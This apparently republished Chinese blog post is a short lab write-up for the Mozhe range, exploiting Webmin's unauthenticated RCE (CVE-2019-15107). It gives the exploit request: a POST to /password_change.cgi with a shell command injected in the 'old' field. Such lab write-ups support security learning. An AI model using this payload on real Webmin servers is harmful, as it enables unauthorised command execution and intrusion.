墨者靶场(初级) Webmin未经身份验证的远程代码执行

Posted 曹振国cc

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了墨者靶场(初级) Webmin未经身份验证的远程代码执行相关的知识,希望对你有一定的参考价值。

命令执行的漏洞在old参数后

 1. 漏洞原理

https://www.anquanke.com/post/id/184668


 2. 漏洞复现

https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md

 3. 漏洞利用

(1)修改提交地址

POST /session_login.cgi HTTP/1.1 ===> POST /password_change.cgi HTTP/1.1

(2)修改提交数据

POC无需管道符,当然大部分都是用 |,也可以

user=rootxx&pam=&expired=2&old=cat /key.txt&new1=test2&new2=test2

image-20210520231301309

image-20210520231634273

image-20210520231718778

cat一下

image-20210520231842732

以上是关于墨者靶场(初级) Webmin未经身份验证的远程代码执行的主要内容,如果未能解决你的问题,请参考以下文章

墨者-(RCE)Webmin未经身份验证的远程代码执行

Webmin未授权远程代码执行复现

墨者靶场(综合)

墨者靶场(综合)

墨者靶场 SQL注入漏洞测试(布尔盲注)

墨者靶场 SQL注入漏洞测试(布尔盲注)